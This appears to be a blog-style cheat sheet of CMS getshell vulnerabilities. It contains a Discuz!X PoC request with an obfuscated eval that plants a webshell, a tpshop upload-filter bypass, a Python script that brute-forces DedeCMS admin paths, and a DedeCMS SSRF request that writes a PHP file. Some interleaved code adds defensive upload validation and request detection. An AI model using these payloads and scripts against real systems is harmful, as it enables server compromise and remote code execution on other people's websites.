NEKO

cms-vul

2018/06/05

All of this can be found on Baidu; I just jot things down when I use them.

Discuz!X upgrade getshell

poc:

```http
url:http://www.xxx.net/utility/convert/index.php?a=config&source=d7.2_x2.0
post:
a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897%29.Chr%28108%29.Chr%2840%29.Chr%2834%29.Chr%2836%29.Chr%2895%29.Chr%2880%29.Chr%2879%29.Chr%2883%29.Chr%2884%29.Chr%2891%29.Chr%28116%29.Chr%28111%29.Chr%28109%29.Chr%2893%29.Chr%2859%29.Chr%2834%29.Chr%2841%29.Chr%2859%29%29%3b%2f%2f%5d=localhost&newconfig%5bsource%5d%5bdbuser%5d=root&newconfig%5bsource%5d%5bdbpw%5d=&newconfig%5bsource%5d%5bdbname%5d=discuz&newconfig%5bsource%5d%5btablepre%5d=cdb_&newconfig%5bsource%5d%5bdbcharset%5d=&newconfig%5bsource%5d%5bpconnect%5d=1&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5btarget%5d%5bdbuser%5d=root&newconfig%5btarget%5d%5bdbpw%5d=&newconfig%5btarget%5d%5bdbname%5d=discuzx&newconfig%5btarget%5d%5btablepre%5d=pre_&newconfig%5btarget%5d%5bdbcharset%5d=&newconfig%5btarget%5d%5bpconnect%5d=1&submit=%b1%a3%b4%e6%b7%fe%ce%f1%c6%f7%c9%e8%d6%c3
```

This writes the one-liner eval("$_POST[tom];"); into:

```
https://webshell.cc/utility/convert/data/config.inc.php
```

tpshop conditional backend getshell

https://www.seebug.org/vuldb/ssvid-96925
Latest version of tpshop, 20180502.
Earlier versions had an unconditional front-end getshell; the latest version only allows a backend getshell, and only under certain conditions.
/application/admin/controller/Uploadify.php, lines 189~215:

```php
// Excerpt of Uploadify.php (lines 189~215); $DIR is assumed to be defined earlier in the file.
if (preg_match("#^data:image/(\w+);base64,(.*)$#", $src, $matches)) {
    $previewUrl = sprintf(
        "%s://%s%s",
        isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off' ? 'https' : 'http',
        $_SERVER['HTTP_HOST'], $_SERVER['REQUEST_URI']
    );
    $previewUrl = str_replace("preview.php", "", $previewUrl);
    $base64 = $matches[2];
    $type = $matches[1];   // the declared image type becomes the file extension
    if ($type === 'jpeg') {
        $type = 'jpg';
    }

    $filename = md5($base64) . ".$type";
    $filePath = $DIR . DIRECTORY_SEPARATOR . $filename;
    if (file_exists($filePath)) {
        die('{"jsonrpc" : "2.0", "result" : "' . $previewUrl . 'preview/' . $filename . '", "id" : "id"}');
    } else {
        $data = base64_decode($base64);
        $filePathLower = strtolower($filePath);
        // Blacklist only: '.php', '../' and '..\' are refused, other executable extensions are not
        if (strstr($filePathLower, '../') || strstr($filePathLower, '..\\') || strstr($filePathLower, '.php')) {
            die('{"jsonrpc" : "2.0", "error" : {"code": 100, "message": "文件上传格式错误 error !"}}');
        }
        file_put_contents($filePath, $data);
        die('{"jsonrpc" : "2.0", "result" : "' . $previewUrl . 'preview/' . $filename . '", "id" : "id"}');
    }
}
```

Compared with the earlier version it now filters php, ../ and ..\, but if the server parses phtml it can still be exploited.
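To make the weakness of that blacklist concrete, here is an added example (my own code, not tpshop's) that models the data-URI handling in Python: blacklist_check mirrors the snippet's filter, while allowlist_check is the hardened form that keys the extension on an allowlist and verifies the decoded bytes against the type's magic. The sample GIF and the "phtml" payload are constructed; UPLOAD_DIR stands in for $DIR.

```python
import base64
import hashlib
import re

# Constructed sample inputs (not from tpshop): a valid 1x1 GIF, and a PHP
# tag declared as "image/phtml" so that the blacklist does not catch it.
GIF_BYTES = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04"
             b"\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
GIF_B64 = base64.b64encode(GIF_BYTES).decode()
PHTML_B64 = base64.b64encode(b"<?php /* constructed placeholder */ ?>").decode()

DATA_URI = re.compile(r"^data:image/(\w+);base64,(.*)$")
UPLOAD_DIR = "preview"  # stands in for $DIR in the tpshop snippet

# Allowlist of accepted extensions and the magic bytes each file must start with.
MAGIC = {"gif": (b"GIF87a", b"GIF89a"),
         "png": (b"\x89PNG\r\n\x1a\n",),
         "jpg": (b"\xff\xd8\xff",)}

def _parse(src):
    m = DATA_URI.match(src)
    if not m:
        return None
    ext = "jpg" if m.group(1) == "jpeg" else m.group(1)
    return ext, m.group(2)

def blacklist_check(src):
    """Mirror of the tpshop filter: the declared type becomes the extension
    and only '../', '..\\' and '.php' are refused, so 'phtml' slips through."""
    parsed = _parse(src)
    if parsed is None:
        return None
    ext, b64 = parsed
    path = (UPLOAD_DIR + "/" + hashlib.md5(b64.encode()).hexdigest() + "." + ext).lower()
    if "../" in path or "..\\" in path or ".php" in path:
        return None
    return path

def allowlist_check(src):
    """Hardened form: the extension must be in the allowlist and the decoded
    bytes must carry that type's magic, so the declared type cannot lie."""
    parsed = _parse(src)
    if parsed is None:
        return None
    ext, b64 = parsed
    if ext not in MAGIC:
        return None
    try:
        data = base64.b64decode(b64, validate=True)
    except ValueError:
        return None
    if not data.startswith(MAGIC[ext]):
        return None
    return UPLOAD_DIR + "/" + hashlib.md5(b64.encode()).hexdigest() + "." + ext
```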

tomcat 7.0.79 7.0.81

CVE-2017-12615
http://www.moonsec.com/post-789.html

dede admin directory name guessing

```python
# coding:utf-8
# Author:LSA
# Description:Brute dedecms background
# Date:20180303
# Version:v1.0
# Python 2 script (print statements, raw_input)

import itertools
import requests
import sys

timeout = 7


def bruteDedeBg(target):
    f0 = 0
    f1 = 0
    bg = ''
    chars = 'abcdefghijklmnopqrstuvwxyz0123456789_!+-='
    data = {
        "_FILES[lsa][tmp_name]": "./{0}</images/admin_top_logo.gif",
        "_FILES[lsa][name]": 0,
        "_FILES[lsa][size]": 0,
        "_FILES[lsa][type]": "image/gif"
    }

    for t in itertools.permutations(chars, 2):
        if f0:
            break
        t = ''.join(t)
        data["_FILES[lsa][tmp_name]"] = data["_FILES[lsa][tmp_name]"].format(t)
        print 'Bruting first two chars: ' + t
        rsp = requests.post(url=target, data=data, timeout=timeout)
        if "Upload filetype not allow !" not in rsp.text and rsp.status_code == 200:
            f0 = 1
            bg = t
            data["_FILES[lsa][tmp_name]"] = "./{0}</images/admin_top_logo.gif"
            print 'First two chars: ' + t
            break
        else:
            data["_FILES[lsa][tmp_name]"] = "./{0}</images/admin_top_logo.gif"

    if f0 == 0:  # permutations() skips repeated chars, so try aa, dd, cc, ... as the first two
        for tt in chars:
            tt = tt + tt
            if f0:
                break
            data["_FILES[lsa][tmp_name]"] = data["_FILES[lsa][tmp_name]"].format(tt)
            print 'Bruting first two chars: ' + tt
            rsp2 = requests.post(url=target, data=data, timeout=timeout)
            if "Upload filetype not allow !" not in rsp2.text and rsp2.status_code == 200:
                f0 = 1
                bg = tt
                data["_FILES[lsa][tmp_name]"] = "./{0}</images/admin_top_logo.gif"
                print 'First two chars: ' + tt
                break
            else:
                data["_FILES[lsa][tmp_name]"] = "./{0}</images/admin_top_logo.gif"

    if f0 == 0:
        print 'Can not brute the first two chars!'
        sys.exit(0)

    for dedebgNum in range(1, 254):
        if f1:
            break
        for c in chars:
            data["_FILES[lsa][tmp_name]"] = data["_FILES[lsa][tmp_name]"].format(bg + c)
            rsp1 = requests.post(url=target, data=data, timeout=timeout)
            if "Upload filetype not allow !" not in rsp1.text and rsp1.status_code == 200:
                bg = bg + c
                print 'Bruting background: ' + bg
                data["_FILES[lsa][tmp_name]"] = "./{0}</images/admin_top_logo.gif"
                break
            else:
                data["_FILES[lsa][tmp_name]"] = "./{0}</images/admin_top_logo.gif"
                if c == '=':
                    f1 = 1
                    break

    print '************************'
    print 'Background is: ' + bg  # if this is not the admin panel, the path may use chars outside `chars` or a defence is in place
    print '************************'


if __name__ == '__main__':
    target = raw_input('Please input the target: ')
    bruteDedeBg(target)
```

Script source:
https://paper.tuisec.win/detail/d1053143f127862
Reference:
https://xz.aliyun.com/t/2064

dede ssrf

A challenge from the 巅峰极客 CTF.
Writeup: https://xz.aliyun.com/t/2469#toc-3
Challenge description:

"For running my own site I still prefer using a shell; this way nobody can possibly break in."

1.php:

```php
<?php
if ($_SERVER['REMOTE_ADDR'] !== '127.0.0.1') {
    die('Who are you? your ip is:'.$_SERVER['REMOTE_ADDR']);
}
$_GET['a']($_GET['b']);
?>
```

The getimagesize function can also make remote HTTP requests, which makes SSRF possible.

poc:

```http
POST /tags.php HTTP/1.1
Host: love.lemon
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,ja;q=0.6
Cookie: YDAL_2132_saltkey=umJCWaoK; YDAL_2132_lastvisit=1531231707; YDAL_2132_ulastactivity=8d9ffh%2BiVUvLiWxFVmAltTKPHq5V9hUJ5PvDa4s84r553KMhDZMx; YDAL_2132_auth=a017j1pf9qMN%2F5Pa1g7C6kyv3ik6f%2B7eqtppI5c6sSWzI0ggQU5wSkRNDoXuXqvSSMnI%2BN3ObxEMn7jaaNJW; YDAL_2132_nofavfid=1; YDAL_2132_lip=10.211.55.2%2C1531237092; YDAL_2132_home_diymode=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 251

dopost=save&_FILES[lsa][tmp_name]=http://127.0.0.1/1.php?a=assert%26b=file_put_contents($_GET[1],base64_decode($_GET[2]));%261=./uploads/soft/aaaa.php%262=PD9waHAgcGhwaW5mbygpOyA/Pg==&_FILES[lsa][name]=0&_FILES[lsa][size]=0&_FILES[lsa][type]=image/gif
```
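Both dede issues above (the directory-guessing script and this SSRF request) hinge on the same root cause: a plain POST parameter named _FILES[...] is registered as if it were a real upload, and its tmp_name is then passed to getimagesize. As an added example (my own detection code, not DedeCMS's), the function below inspects a form-encoded body and flags attempts to register superglobal or config names, a URL in tmp_name, and the '<' marker the guessing script relies on. The prefix list is an assumption modelled on the kind of variable-name check DedeCMS performs, and the sample bodies are constructed from the two PoCs with the payloads replaced.

```python
from urllib.parse import parse_qsl, urlsplit

# Request variable names with these prefixes must never be registered as
# globals. Assumption: modelled on the name check in DedeCMS's common.inc.php,
# not copied from it.
FORBIDDEN_PREFIXES = ("GLOBALS", "_GET", "_POST", "_COOKIE",
                      "_FILES", "_SERVER", "_SESSION", "cfg_")

def inspect_body(body):
    """Return (parameter, reason) findings for one form-encoded POST body."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        base = name.split("[", 1)[0]          # "_FILES[lsa][tmp_name]" -> "_FILES"
        if base.startswith(FORBIDDEN_PREFIXES):
            findings.append((name, "request registers a superglobal/config name"))
        if name.endswith("[tmp_name]"):
            if urlsplit(value).scheme:        # tmp_name should be a local path, never a URL
                findings.append((name, "URL in tmp_name (SSRF via getimagesize)"))
            if "<" in value:                  # marker used by the directory-guessing script
                findings.append((name, "'<' in tmp_name (directory existence probe)"))
    return findings

# Constructed bodies modelled on the two PoCs above (payloads replaced).
BRUTE_BODY = ("dopost=save&_FILES[lsa][tmp_name]=./ab</images/admin_top_logo.gif"
              "&_FILES[lsa][name]=0&_FILES[lsa][size]=0&_FILES[lsa][type]=image/gif")
SSRF_BODY = ("dopost=save&_FILES[lsa][tmp_name]=http://127.0.0.1/1.php?a=x%26b=y"
             "&_FILES[lsa][name]=0&_FILES[lsa][size]=0&_FILES[lsa][type]=image/gif")
BENIGN_BODY = "dopost=save&tag=news&aid=12"

if __name__ == "__main__":
    for label, body in (("brute", BRUTE_BODY), ("ssrf", SSRF_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_body(body))
```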

thinkphp cache getshell

https://www.cnblogs.com/h2zZhou/p/7824723.html

Author: n3k0

Published: June 5th 2018, 11:22:41

